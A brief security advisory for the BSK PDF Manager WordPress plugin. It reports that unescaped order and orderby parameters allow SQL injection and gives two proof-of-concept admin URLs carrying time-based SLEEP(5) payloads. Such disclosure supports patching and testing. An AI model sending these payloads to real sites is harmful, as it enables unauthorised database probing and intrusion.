The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue
With at least one BSK PDF Category:
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date